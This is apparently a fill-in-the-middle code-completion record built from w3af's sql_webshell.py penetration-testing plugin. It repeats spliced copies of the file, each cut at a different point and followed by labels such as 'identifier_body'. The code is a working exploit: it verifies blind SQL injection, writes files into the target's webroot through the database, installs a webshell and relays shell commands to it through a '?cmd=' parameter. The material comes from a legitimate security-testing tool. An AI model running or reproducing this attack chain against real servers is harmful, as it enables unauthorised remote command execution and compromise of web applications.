Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
'''
import core.controllers.outputManager as om
import core.data.request.httpPostDataRequest as httpPostDataRequest
import core.data.request.httpQsRequest as httpQsRequest
from core.controllers.basePlugin.baseAttackPlugin import baseAttackPlugin
from core.data.parsers.urlParser import parse_qs, url_object
from core.controllers.w3afException import w3afException
from plugins.attack.db.dbDriverBuilder import dbDriverBuilder as dbDriverBuilder
from core.controllers.sql_tools.blind_sqli_response_diff import blind_sqli_response_diff
from core.controllers.misc.webroot import get_webroot_dirs
from core.data.fuzzer.fuzzer import createRandAlNum
import core.data.kb.knowledgeBase as kb
import core.data.kb.vuln as vuln
from core.data.kb.shell import shell as shell
import plugins.attack.payloads.shell_handler as shell_handler
from plugins.attack.payloads.decorators.exec_decorator import exec_debug
# options
from core.data.options.option import option
from core.data.options.optionList import optionList
import urllib
class sql_webshell(baseAttackPlugin):
'''
Exploits [blind] sql injections by uploading a webshell to the target webroot.
'''
def __init__(self):
baseAttackPlugin.__init__(self)
# Internal variables
self._vuln = None
self._driver = None
# User configured options for fastExploit
self._url = ''
self._method = 'GET'
self._data = ''
self._injvar = ''
# User configured variables
self._equalLimit = 0.9
self._equAlgorithm = 'setIntersection'
self._goodSamaritan = True
self._generateOnlyOne = True
def fastExploit( self ):
'''
Exploits a web app with [blind] sql injections vulns.
The options are configured using the plugin options and setOptions() method.
'''
om.out.debug( 'Starting sql_webshell fastExploit.' )
if self._url is None or self._method is None or self._data is None or self._injvar is None:
raise w3afException('You have to configure the plugin parameters')
else:
freq = None
if self._method == 'POST':
freq = httpPostDataRequest.httpPostDataRequest()
elif self._method == 'GET':
freq = httpQsRequest.httpQsRequest()
else:
raise w3afException('Method not supported.')
freq.setURL( self._url )
freq.setDc( parse_qs( self._data ) )
freq.setHeaders( {} )
bsql = blind_sqli_response_diff()
bsql.setUrlOpener( self._urlOpener )
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
vuln_obj = bsql.is_injectable( freq, self._injvar )
if not vuln_obj:
raise w3afException('Could not verify SQL injection ' + str(vuln) )
else:
om.out.console('SQL injection could be verified, trying to create the DB driver.')
# Try to get a shell using all vuln
msg = 'Trying to exploit using vulnerability with id: ' + str( vuln_obj.getId() )
msg += '. Please wait...'
om.out.console( msg )
shell_obj = self._generateShell( vuln_obj )
if shell_obj is not None:
kb.kb.append( self, 'shell', shell_obj )
return [shell_obj, ]
raise w3afException('No exploitable vulnerabilities found.')
def getAttackType(self):
'''
@return: The type of exploit, SHELL, PROXY, etc.
'''
return 'shell'
def getExploitableVulns(self):
vulns = kb.kb.getData( 'blindSqli' , 'blindSqli' )
vulns.extend( kb.kb.getData( 'sqli' , 'sqli' ) )
return vulns
def canExploit( self, vulnToExploit=None ):
'''
Searches the kb for vulnerabilities that the plugin can exploit.
@return: True if plugin knows how to exploit a found vuln.
'''
vulns = self.getExploitableVulns()
if vulnToExploit is not None:
vulns = [ v for v in vulns if v.getId() == vulnToExploit ]
if len(vulns) != 0:
return True
else:
om.out.console( 'No [blind] SQL injection vulnerabilities have been found.' )
om.out.console( 'Hint #1: Try to find vulnerabilities using the audit plugins.' )
msg = 'Hint #2: Use the set command to enter the values yourself, and then exploit it using fastExploit.'
om.out.console( msg )
return False
def exploit( self, vulnToExploit=None ):
'''
Exploits a [blind] sql injections vulns that was found and stored in the kb.
@return: True if the shell is working and the user can start calling specific_user_input
'''
if not self.canExploit():
return []
else:
vulns = kb.kb.getData( 'blindSqli' , 'blindSqli' )
vulns.extend( kb.kb.getData( 'sqli' , 'sqli' ) )
bsql = blind_sqli_response_diff()
bsql.setUrlOpener( self._urlOpener )
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
tmp_vuln_list = []
for v in vulns:
# Filter the vuln that was selected by the user
if vulnToExploit is not None:
if vulnToExploit != v.getId():
continue
mutant = v.getMutant()
mutant.setModValue( mutant.getOriginalValue() )
v.setMutant( mutant )
# The user didn't selected anything, or we are in the selected vuln!
om.out.debug('Verifying vulnerability in URL: "' + v.getURL() + '".')
vuln_obj = bsql.is_injectable( v.getMutant().getFuzzableReq(), v.getVar() )
if vuln_obj:
tmp_vuln_list.append( vuln_obj )
# Ok, go to the next stage with the filtered vulnerabilities
vulns = tmp_vuln_list
if len(vulns) == 0:
om.out.debug('is_injectable failed for all vulnerabilities.')
return []
else:
for vuln_obj in vulns:
# Try to get a shell using all vuln
msg = 'Trying to exploit using vulnerability with id: ' + str( vuln_obj.getId() )
msg += '. Please wait...'
om.out.console( msg )
shell_obj = self._generateShell( vuln_obj )
if shell_obj:
if self._generateOnlyOne:
# A shell was generated, I only need one point of exec.
return [shell_obj, ]
else:
# Keep adding all shells to the kb
pass
return kb.kb.getData( self.getName(), 'shell' )
def _generateShell( self, vuln_obj ):
'''
@parameter vuln_obj: The vuln to exploit, as it was saved in the kb or supplied by the user with set commands.
@return: A sql_webshell shell object if sql_webshell could fingerprint the database.
'''
bsql = blind_sqli_response_diff()
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
dbBuilder = dbDriverBuilder( self._urlOpener, bsql.equal )
driver = dbBuilder.getDriverForVuln( vuln_obj )
if driver is None:
return None
else:
# We have a driver, now, using this driver, we have to create the webshell in the
# target's webroot!
webshell_url = self._upload_webshell( driver, vuln_obj )
if webshell_url:
# Define the corresponding cut...
response = self._urlOpener.GET( webshell_url )
self._define_exact_cut( response.getBody(), shell_handler.SHELL_IDENTIFIER )
# Create the shell object
# Set shell parameters
shell_obj = sql_web_shell( vuln_obj )
shell_obj.setUrlOpener( self._urlOpener )
shell_obj.setWebShellURL( webshell_url )
shell_obj.set_cut( self._header_length, self._footer_length )
kb.kb.append( self, 'shell', shell_obj )
return shell_obj
else:
# Sad face :(
return None
def | (self, driver, vuln_obj):
'''
First, upload any file to the target webroot.
Once I've found the target webroot (or any other location inside the webroot where I can
write a file) try to upload a webshell and test for execution.
@parameter driver: The database driver to use in order to upload the file.
@parameter vuln_obj: The vulnerability that we are exploiting.
@return: The webshell URL if the webshell was uploaded, or None if the process failed.
'''
upload_success = False
# First, we test if we can upload a file into a directory we can access:
webroot_dirs = get_webroot_dirs( vuln_obj.getURL().getDomain() )
for webroot in webroot_dirs:
if upload_success: break
# w3af found a lot of directories, and we are going to use that knowledgeBase
# because one of the dirs may be writable and one may not!
for path in self._get_site_directories():
# Create the remote_path
remote_path = webroot + '/' + path
# Create the filename
remote_filename = createRandAlNum( 8 ) + '.' + createRandAlNum(3)
remote_path += '/' + remote_filename
# And just in case... remove double slashes
for i in xrange(3): remote_path = remote_path.replace('//', '/')
# Create the content (which will also act as the test_string)
test_string = content = createRandAlNum(16)
# Create the test URL
test_url = vuln_obj.getURL().urlJoin( path + '/' + remote_filename )
if self._upload_file( driver, remote_path, content, test_url, test_string):
upload_success = True
om.out.console('Successfully wrote a file to the webroot.')
break
# We can upload files, and we know where they are uploaded, now we
# just need to upload a webshell that works in that environment!
if upload_success:
om.out.console('Trying to write a webshell.')
# Get the extension from the vulnerable script
extension = vuln_obj.getURL().getExtension()
for file_content, real_extension in shell_handler.get_webshells( extension ):
# Create the variables to upload the file, based on the success of the
# previous for loop:
remote_path = remote_path[:remote_path.rfind('/')]
filename = createRandAlNum( 8 )
remote_path += '/' + filename + '.' + real_extension
# And now do "the same thing" with the URL
test_url = test_url[:test_url.rfind('/')]
test_url += '/' + filename + '.' + real_extension + '?cmd='
# Upload & test
if self._upload_file( driver, remote_path, file_content, test_url, shell_handler.SHELL_IDENTIFIER):
# Complete success!
om.out.console('Successfully installed a webshell in the target server!')
return test_url
return None
def _upload_file(self, driver, remote_path, content, test_url, test_string):
'''
Uploads a file to the target server, to the remote_path using the given SQL driver.
The content of the file is "content", and check if it was successfully uploaded using a
GET request to test_url and searching for the test_string string.
@return: True if the file was uploaded.
'''
msg = 'Writing "' + content + '" to "' + remote_path +'" and searching it at: "'
msg += test_url +'".'
om.out.debug( msg )
try:
driver.writeFile( remote_path , content )
response = self._urlOpener.GET( test_url )
except Exception, e:
om.out.error('Exception raised while uploading file: "' + str(e) + '".')
return False
else:
if test_string in response.getBody():
return True
else:
return False
def _get_site_directories(self):
'''
@return: A list of the website directories.
'''
url_list = kb.kb.getData('urls','urlList')
url_list = [ i.getPathWithoutFile() for i in url_list ]
url_list = list(set(url_list))
return url_list
def getOptions( self ):
'''
@return: A list of option objects for this plugin.
'''
d1 = 'URL to exploit with fastExploit()'
o1 = option('url', self._url, d1, 'string')
d2 = 'Method to use with fastExploit()'
o2 = option('method', self._method, d2, 'string')
d3 = 'Data to send with fastExploit()'
o3 = option('data', self._data, d3, 'string')
d4 = 'Variable where to inject with fastExploit()'
o4 = option('injvar', self._injvar, d4, 'string')
d5 = 'The algorithm to use in the comparison of true and false response for blind sql.'
h5 = 'The options are: "stringEq" and "setIntersection". Read the user documentation for'
h5 += ' details.'
o5 = option('equAlgorithm', self._equAlgorithm, d5, 'string', help=h5)
d6 = 'Set the equal limit variable'
h6 = 'Two pages are equal if they match in more than equalLimit. Only used when'
h6 += ' equAlgorithm is set to setIntersection.'
o6 = option('equalLimit', self._equalLimit, d6, 'float', help=h6)
d7 = 'Enable or disable the good samaritan module'
h7 = 'The good samaritan module is a the best way to speed up blind sql exploitations.'
h7 += ' It\'s really simple, you see messages in the console that show the status of the'
h7 += ' discovery and you can help the discovery. For example, if you see "Micros" you'
h7 += ' could type "oft", and if it\'s correct, you have made your good action of the day'
h7 += ', speeded up the discovery AND had fun doing it.'
o7 = option('goodSamaritan', self._goodSamaritan, d7, 'boolean', help=h7)
d8 = 'If true, this plugin will try to generate only one shell object.'
o8 = option('generateOnlyOne', self._generateOnlyOne, d8, 'boolean')
ol = optionList()
ol.add(o1)
ol.add(o2)
ol.add(o3)
ol.add(o4)
ol.add(o5)
ol.add(o6)
ol.add(o7)
ol.add(o8)
return ol
def setOptions( self, optionsMap ):
'''
This method sets all the options that are configured using the user interface
generated by the framework using the result of getOptions().
@parameter optionsMap: A map with the options for the plugin.
@return: No value is returned.
'''
self._url = url_object( optionsMap['url'].getValue() ).uri2url()
if optionsMap['method'].getValue() not in ['GET', 'POST']:
raise w3afException('Unknown method.')
else:
self._method = optionsMap['method'].getValue()
self._data = optionsMap['data'].getValue()
self._injvar = optionsMap['injvar'].getValue()
self._equAlgorithm = optionsMap['equAlgorithm'].getValue()
self._equalLimit = optionsMap['equalLimit'].getValue()
self._goodSamaritan = optionsMap['goodSamaritan'].getValue()
self._generateOnlyOne = optionsMap['generateOnlyOne'].getValue()
def getPluginDeps( self ):
'''
@return: A list with the names of the plugins that should be runned before the
current one.
'''
return []
def getRootProbability( self ):
'''
@return: This method returns the probability of getting a root shell using this attack plugin.
This is used by the "exploit *" function to order the plugins and first try to exploit the more critical ones.
This method should return 0 for an exploit that will never return a root shell, and 1 for an exploit that WILL ALWAYS
return a root shell.
'''
return 0.1
def getLongDesc( self ):
'''
@return: A DETAILED description of the plugin functions and features.
'''
return '''
This plugin exploits [blind] sql injections.
The original sql_webshell program was coded by Bernardo Damele and Daniele Bellucci, many thanks to both of
them.
Seven configurable parameters exist:
- url
- method
- data
- injvar
- equAlgorithm
- equalLimit
'''
class sql_web_shell(shell):
def setWebShellURL( self, eu ):
self._webshell_url = eu
def getWebShellURL( self ):
return self._webshell_url
@exec_debug
def execute( self, command ):
'''
This method is called when a user writes a command in the shell and hits enter.
Before calling this method, the framework calls the generic_user_input method
from the shell class.
@parameter command: The command to handle ( ie. "read", "exec", etc ).
@return: The result of the command.
'''
to_send = self.getWebShellURL() + urllib.quote_plus( command )
response = self._urlOpener.GET( to_send )
return self._cut(response.getBody())
def end( self ):
om.out.debug('sql_web_shell cleanup complete.')
def getName( self ):
return 'sql_web_shell'
| _upload_webshell | identifier_name |
sql_webshell.py | '''
sql_webshell.py
Copyright 2006 Andres Riancho
This file is part of w3af, w3af.sourceforge.net .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
'''
import core.controllers.outputManager as om
import core.data.request.httpPostDataRequest as httpPostDataRequest
import core.data.request.httpQsRequest as httpQsRequest
from core.controllers.basePlugin.baseAttackPlugin import baseAttackPlugin
from core.data.parsers.urlParser import parse_qs, url_object
from core.controllers.w3afException import w3afException
from plugins.attack.db.dbDriverBuilder import dbDriverBuilder as dbDriverBuilder
from core.controllers.sql_tools.blind_sqli_response_diff import blind_sqli_response_diff
from core.controllers.misc.webroot import get_webroot_dirs
from core.data.fuzzer.fuzzer import createRandAlNum
import core.data.kb.knowledgeBase as kb
import core.data.kb.vuln as vuln
from core.data.kb.shell import shell as shell
import plugins.attack.payloads.shell_handler as shell_handler
from plugins.attack.payloads.decorators.exec_decorator import exec_debug
# options
from core.data.options.option import option
from core.data.options.optionList import optionList
import urllib
class sql_webshell(baseAttackPlugin):
'''
Exploits [blind] sql injections by uploading a webshell to the target webroot.
'''
def __init__(self):
baseAttackPlugin.__init__(self)
# Internal variables
self._vuln = None
self._driver = None
# User configured options for fastExploit
self._url = ''
self._method = 'GET'
self._data = ''
self._injvar = ''
# User configured variables
self._equalLimit = 0.9
self._equAlgorithm = 'setIntersection'
self._goodSamaritan = True
self._generateOnlyOne = True
def fastExploit( self ):
'''
Exploits a web app with [blind] sql injections vulns.
The options are configured using the plugin options and setOptions() method.
'''
om.out.debug( 'Starting sql_webshell fastExploit.' )
if self._url is None or self._method is None or self._data is None or self._injvar is None:
raise w3afException('You have to configure the plugin parameters')
else:
freq = None
if self._method == 'POST':
freq = httpPostDataRequest.httpPostDataRequest()
elif self._method == 'GET':
freq = httpQsRequest.httpQsRequest()
else:
raise w3afException('Method not supported.')
freq.setURL( self._url )
freq.setDc( parse_qs( self._data ) )
freq.setHeaders( {} )
bsql = blind_sqli_response_diff()
bsql.setUrlOpener( self._urlOpener )
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
vuln_obj = bsql.is_injectable( freq, self._injvar )
if not vuln_obj:
raise w3afException('Could not verify SQL injection ' + str(vuln) )
else:
om.out.console('SQL injection could be verified, trying to create the DB driver.')
# Try to get a shell using all vuln
msg = 'Trying to exploit using vulnerability with id: ' + str( vuln_obj.getId() )
msg += '. Please wait...'
om.out.console( msg )
shell_obj = self._generateShell( vuln_obj )
if shell_obj is not None:
kb.kb.append( self, 'shell', shell_obj )
return [shell_obj, ]
raise w3afException('No exploitable vulnerabilities found.')
def getAttackType(self):
'''
@return: The type of exploit, SHELL, PROXY, etc.
'''
return 'shell'
def getExploitableVulns(self):
vulns = kb.kb.getData( 'blindSqli' , 'blindSqli' )
vulns.extend( kb.kb.getData( 'sqli' , 'sqli' ) )
return vulns
def canExploit( self, vulnToExploit=None ):
'''
Searches the kb for vulnerabilities that the plugin can exploit.
@return: True if plugin knows how to exploit a found vuln.
'''
vulns = self.getExploitableVulns()
if vulnToExploit is not None:
vulns = [ v for v in vulns if v.getId() == vulnToExploit ]
if len(vulns) != 0:
return True
else:
om.out.console( 'No [blind] SQL injection vulnerabilities have been found.' )
om.out.console( 'Hint #1: Try to find vulnerabilities using the audit plugins.' )
msg = 'Hint #2: Use the set command to enter the values yourself, and then exploit it using fastExploit.'
om.out.console( msg )
return False
def exploit( self, vulnToExploit=None ):
'''
Exploits a [blind] sql injections vulns that was found and stored in the kb.
@return: True if the shell is working and the user can start calling specific_user_input
'''
if not self.canExploit():
return []
else:
vulns = kb.kb.getData( 'blindSqli' , 'blindSqli' )
vulns.extend( kb.kb.getData( 'sqli' , 'sqli' ) )
bsql = blind_sqli_response_diff()
bsql.setUrlOpener( self._urlOpener )
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
tmp_vuln_list = []
for v in vulns:
# Filter the vuln that was selected by the user
if vulnToExploit is not None:
if vulnToExploit != v.getId():
continue
mutant = v.getMutant()
mutant.setModValue( mutant.getOriginalValue() )
v.setMutant( mutant )
# The user didn't selected anything, or we are in the selected vuln!
om.out.debug('Verifying vulnerability in URL: "' + v.getURL() + '".')
vuln_obj = bsql.is_injectable( v.getMutant().getFuzzableReq(), v.getVar() )
if vuln_obj:
tmp_vuln_list.append( vuln_obj )
# Ok, go to the next stage with the filtered vulnerabilities
vulns = tmp_vuln_list
if len(vulns) == 0:
om.out.debug('is_injectable failed for all vulnerabilities.')
return []
else:
for vuln_obj in vulns:
# Try to get a shell using all vuln
msg = 'Trying to exploit using vulnerability with id: ' + str( vuln_obj.getId() )
msg += '. Please wait...'
om.out.console( msg )
shell_obj = self._generateShell( vuln_obj )
if shell_obj:
if self._generateOnlyOne:
# A shell was generated, I only need one point of exec.
return [shell_obj, ]
else:
# Keep adding all shells to the kb
pass
return kb.kb.getData( self.getName(), 'shell' )
def _generateShell( self, vuln_obj ):
'''
@parameter vuln_obj: The vuln to exploit, as it was saved in the kb or supplied by the user with set commands.
@return: A sql_webshell shell object if sql_webshell could fingerprint the database.
'''
bsql = blind_sqli_response_diff()
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
dbBuilder = dbDriverBuilder( self._urlOpener, bsql.equal )
driver = dbBuilder.getDriverForVuln( vuln_obj )
if driver is None:
return None
else:
# We have a driver, now, using this driver, we have to create the webshell in the
# target's webroot!
webshell_url = self._upload_webshell( driver, vuln_obj )
if webshell_url:
# Define the corresponding cut...
response = self._urlOpener.GET( webshell_url )
self._define_exact_cut( response.getBody(), shell_handler.SHELL_IDENTIFIER )
# Create the shell object
# Set shell parameters
shell_obj = sql_web_shell( vuln_obj )
shell_obj.setUrlOpener( self._urlOpener )
shell_obj.setWebShellURL( webshell_url )
shell_obj.set_cut( self._header_length, self._footer_length )
kb.kb.append( self, 'shell', shell_obj )
return shell_obj
else:
# Sad face :(
return None
def _upload_webshell(self, driver, vuln_obj):
'''
First, upload any file to the target webroot.
Once I've found the target webroot (or any other location inside the webroot where I can
write a file) try to upload a webshell and test for execution.
@parameter driver: The database driver to use in order to upload the file.
@parameter vuln_obj: The vulnerability that we are exploiting.
@return: The webshell URL if the webshell was uploaded, or None if the process failed.
'''
upload_success = False
# First, we test if we can upload a file into a directory we can access:
webroot_dirs = get_webroot_dirs( vuln_obj.getURL().getDomain() )
for webroot in webroot_dirs:
if upload_success: break
# w3af found a lot of directories, and we are going to use that knowledgeBase
# because one of the dirs may be writable and one may not!
for path in self._get_site_directories():
# Create the remote_path
remote_path = webroot + '/' + path
# Create the filename
remote_filename = createRandAlNum( 8 ) + '.' + createRandAlNum(3)
remote_path += '/' + remote_filename
# And just in case... remove double slashes
for i in xrange(3): remote_path = remote_path.replace('//', '/')
# Create the content (which will also act as the test_string)
test_string = content = createRandAlNum(16)
# Create the test URL
test_url = vuln_obj.getURL().urlJoin( path + '/' + remote_filename )
if self._upload_file( driver, remote_path, content, test_url, test_string):
upload_success = True
om.out.console('Successfully wrote a file to the webroot.')
break
# We can upload files, and we know where they are uploaded, now we
# just need to upload a webshell that works in that environment!
if upload_success:
om.out.console('Trying to write a webshell.')
# Get the extension from the vulnerable script
extension = vuln_obj.getURL().getExtension()
for file_content, real_extension in shell_handler.get_webshells( extension ):
# Create the variables to upload the file, based on the success of the
# previous for loop:
remote_path = remote_path[:remote_path.rfind('/')]
filename = createRandAlNum( 8 )
remote_path += '/' + filename + '.' + real_extension
# And now do "the same thing" with the URL
test_url = test_url[:test_url.rfind('/')]
test_url += '/' + filename + '.' + real_extension + '?cmd='
# Upload & test
if self._upload_file( driver, remote_path, file_content, test_url, shell_handler.SHELL_IDENTIFIER):
# Complete success!
om.out.console('Successfully installed a webshell in the target server!')
return test_url
return None
def _upload_file(self, driver, remote_path, content, test_url, test_string):
'''
Uploads a file to the target server, to the remote_path using the given SQL driver.
The content of the file is "content", and check if it was successfully uploaded using a
GET request to test_url and searching for the test_string string.
@return: True if the file was uploaded.
'''
msg = 'Writing "' + content + '" to "' + remote_path +'" and searching it at: "'
msg += test_url +'".'
om.out.debug( msg )
try:
driver.writeFile( remote_path , content )
response = self._urlOpener.GET( test_url )
except Exception, e:
om.out.error('Exception raised while uploading file: "' + str(e) + '".')
return False
else:
if test_string in response.getBody():
return True
else:
return False
def _get_site_directories(self):
'''
@return: A list of the website directories.
'''
url_list = kb.kb.getData('urls','urlList')
url_list = [ i.getPathWithoutFile() for i in url_list ]
url_list = list(set(url_list))
return url_list
def getOptions( self ):
'''
@return: A list of option objects for this plugin.
'''
d1 = 'URL to exploit with fastExploit()'
o1 = option('url', self._url, d1, 'string')
d2 = 'Method to use with fastExploit()'
o2 = option('method', self._method, d2, 'string')
d3 = 'Data to send with fastExploit()'
o3 = option('data', self._data, d3, 'string')
d4 = 'Variable where to inject with fastExploit()'
o4 = option('injvar', self._injvar, d4, 'string')
d5 = 'The algorithm to use in the comparison of true and false response for blind sql.'
h5 = 'The options are: "stringEq" and "setIntersection". Read the user documentation for'
h5 += ' details.'
o5 = option('equAlgorithm', self._equAlgorithm, d5, 'string', help=h5)
d6 = 'Set the equal limit variable'
h6 = 'Two pages are equal if they match in more than equalLimit. Only used when'
h6 += ' equAlgorithm is set to setIntersection.'
o6 = option('equalLimit', self._equalLimit, d6, 'float', help=h6)
d7 = 'Enable or disable the good samaritan module'
h7 = 'The good samaritan module is a the best way to speed up blind sql exploitations.'
h7 += ' It\'s really simple, you see messages in the console that show the status of the'
h7 += ' discovery and you can help the discovery. For example, if you see "Micros" you'
h7 += ' could type "oft", and if it\'s correct, you have made your good action of the day'
h7 += ', speeded up the discovery AND had fun doing it.'
o7 = option('goodSamaritan', self._goodSamaritan, d7, 'boolean', help=h7)
d8 = 'If true, this plugin will try to generate only one shell object.'
o8 = option('generateOnlyOne', self._generateOnlyOne, d8, 'boolean')
ol = optionList()
ol.add(o1)
ol.add(o2)
ol.add(o3)
ol.add(o4)
ol.add(o5)
ol.add(o6)
ol.add(o7)
ol.add(o8)
return ol
def setOptions( self, optionsMap ):
'''
This method sets all the options that are configured using the user interface
generated by the framework using the result of getOptions().
@parameter optionsMap: A map with the options for the plugin.
@return: No value is returned.
'''
self._url = url_object( optionsMap['url'].getValue() ).uri2url()
if optionsMap['method'].getValue() not in ['GET', 'POST']:
raise w3afException('Unknown method.')
else:
self._method = optionsMap['method'].getValue()
self._data = optionsMap['data'].getValue()
self._injvar = optionsMap['injvar'].getValue()
self._equAlgorithm = optionsMap['equAlgorithm'].getValue()
self._equalLimit = optionsMap['equalLimit'].getValue()
self._goodSamaritan = optionsMap['goodSamaritan'].getValue()
self._generateOnlyOne = optionsMap['generateOnlyOne'].getValue()
def getPluginDeps( self ):
'''
@return: A list with the names of the plugins that should be runned before the
current one.
'''
return []
def getRootProbability( self ):
'''
@return: This method returns the probability of getting a root shell using this attack plugin.
This is used by the "exploit *" function to order the plugins and first try to exploit the more critical ones.
This method should return 0 for an exploit that will never return a root shell, and 1 for an exploit that WILL ALWAYS
return a root shell.
'''
return 0.1
def getLongDesc( self ):
'''
@return: A DETAILED description of the plugin functions and features.
'''
return '''
This plugin exploits [blind] sql injections.
The original sql_webshell program was coded by Bernardo Damele and Daniele Bellucci, many thanks to both of
them.
Seven configurable parameters exist:
- url
- method
- data
- injvar
- equAlgorithm
- equalLimit
'''
class sql_web_shell(shell):
def setWebShellURL( self, eu ):
self._webshell_url = eu
def getWebShellURL( self ):
return self._webshell_url
@exec_debug
def execute( self, command ):
|
def end( self ):
om.out.debug('sql_web_shell cleanup complete.')
def getName( self ):
return 'sql_web_shell'
| '''
This method is called when a user writes a command in the shell and hits enter.
Before calling this method, the framework calls the generic_user_input method
from the shell class.
@parameter command: The command to handle ( ie. "read", "exec", etc ).
@return: The result of the command.
'''
to_send = self.getWebShellURL() + urllib.quote_plus( command )
response = self._urlOpener.GET( to_send )
return self._cut(response.getBody()) | identifier_body |
sql_webshell.py | '''
sql_webshell.py
Copyright 2006 Andres Riancho
This file is part of w3af, w3af.sourceforge.net .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
'''
import core.controllers.outputManager as om
import core.data.request.httpPostDataRequest as httpPostDataRequest
import core.data.request.httpQsRequest as httpQsRequest
from core.controllers.basePlugin.baseAttackPlugin import baseAttackPlugin
from core.data.parsers.urlParser import parse_qs, url_object
from core.controllers.w3afException import w3afException
from plugins.attack.db.dbDriverBuilder import dbDriverBuilder as dbDriverBuilder
from core.controllers.sql_tools.blind_sqli_response_diff import blind_sqli_response_diff
from core.controllers.misc.webroot import get_webroot_dirs
from core.data.fuzzer.fuzzer import createRandAlNum
import core.data.kb.knowledgeBase as kb
import core.data.kb.vuln as vuln
from core.data.kb.shell import shell as shell
import plugins.attack.payloads.shell_handler as shell_handler
from plugins.attack.payloads.decorators.exec_decorator import exec_debug
# options
from core.data.options.option import option
from core.data.options.optionList import optionList
import urllib
class sql_webshell(baseAttackPlugin):
'''
Exploits [blind] sql injections by uploading a webshell to the target webroot.
'''
def __init__(self):
baseAttackPlugin.__init__(self)
# Internal variables
self._vuln = None
self._driver = None
# User configured options for fastExploit
self._url = ''
self._method = 'GET'
self._data = ''
self._injvar = ''
# User configured variables
self._equalLimit = 0.9
self._equAlgorithm = 'setIntersection'
self._goodSamaritan = True
self._generateOnlyOne = True
def fastExploit( self ):
'''
Exploits a web app with [blind] sql injections vulns.
The options are configured using the plugin options and setOptions() method.
'''
om.out.debug( 'Starting sql_webshell fastExploit.' )
if self._url is None or self._method is None or self._data is None or self._injvar is None:
raise w3afException('You have to configure the plugin parameters')
else:
freq = None
if self._method == 'POST':
freq = httpPostDataRequest.httpPostDataRequest()
elif self._method == 'GET':
freq = httpQsRequest.httpQsRequest()
else:
raise w3afException('Method not supported.')
freq.setURL( self._url )
freq.setDc( parse_qs( self._data ) )
freq.setHeaders( {} )
bsql = blind_sqli_response_diff()
bsql.setUrlOpener( self._urlOpener )
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
vuln_obj = bsql.is_injectable( freq, self._injvar )
if not vuln_obj:
raise w3afException('Could not verify SQL injection ' + str(vuln) )
else:
om.out.console('SQL injection could be verified, trying to create the DB driver.')
# Try to get a shell using all vuln
msg = 'Trying to exploit using vulnerability with id: ' + str( vuln_obj.getId() )
msg += '. Please wait...'
om.out.console( msg )
shell_obj = self._generateShell( vuln_obj )
if shell_obj is not None:
kb.kb.append( self, 'shell', shell_obj )
return [shell_obj, ] |
raise w3afException('No exploitable vulnerabilities found.')
def getAttackType(self):
'''
@return: The type of exploit, SHELL, PROXY, etc.
'''
return 'shell'
def getExploitableVulns(self):
vulns = kb.kb.getData( 'blindSqli' , 'blindSqli' )
vulns.extend( kb.kb.getData( 'sqli' , 'sqli' ) )
return vulns
def canExploit( self, vulnToExploit=None ):
'''
Searches the kb for vulnerabilities that the plugin can exploit.
@return: True if plugin knows how to exploit a found vuln.
'''
vulns = self.getExploitableVulns()
if vulnToExploit is not None:
vulns = [ v for v in vulns if v.getId() == vulnToExploit ]
if len(vulns) != 0:
return True
else:
om.out.console( 'No [blind] SQL injection vulnerabilities have been found.' )
om.out.console( 'Hint #1: Try to find vulnerabilities using the audit plugins.' )
msg = 'Hint #2: Use the set command to enter the values yourself, and then exploit it using fastExploit.'
om.out.console( msg )
return False
def exploit( self, vulnToExploit=None ):
'''
Exploits a [blind] sql injections vulns that was found and stored in the kb.
@return: True if the shell is working and the user can start calling specific_user_input
'''
if not self.canExploit():
return []
else:
vulns = kb.kb.getData( 'blindSqli' , 'blindSqli' )
vulns.extend( kb.kb.getData( 'sqli' , 'sqli' ) )
bsql = blind_sqli_response_diff()
bsql.setUrlOpener( self._urlOpener )
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
tmp_vuln_list = []
for v in vulns:
# Filter the vuln that was selected by the user
if vulnToExploit is not None:
if vulnToExploit != v.getId():
continue
mutant = v.getMutant()
mutant.setModValue( mutant.getOriginalValue() )
v.setMutant( mutant )
# The user didn't selected anything, or we are in the selected vuln!
om.out.debug('Verifying vulnerability in URL: "' + v.getURL() + '".')
vuln_obj = bsql.is_injectable( v.getMutant().getFuzzableReq(), v.getVar() )
if vuln_obj:
tmp_vuln_list.append( vuln_obj )
# Ok, go to the next stage with the filtered vulnerabilities
vulns = tmp_vuln_list
if len(vulns) == 0:
om.out.debug('is_injectable failed for all vulnerabilities.')
return []
else:
for vuln_obj in vulns:
# Try to get a shell using all vuln
msg = 'Trying to exploit using vulnerability with id: ' + str( vuln_obj.getId() )
msg += '. Please wait...'
om.out.console( msg )
shell_obj = self._generateShell( vuln_obj )
if shell_obj:
if self._generateOnlyOne:
# A shell was generated, I only need one point of exec.
return [shell_obj, ]
else:
# Keep adding all shells to the kb
pass
return kb.kb.getData( self.getName(), 'shell' )
def _generateShell( self, vuln_obj ):
'''
@parameter vuln_obj: The vuln to exploit, as it was saved in the kb or supplied by the user with set commands.
@return: A sql_webshell shell object if sql_webshell could fingerprint the database.
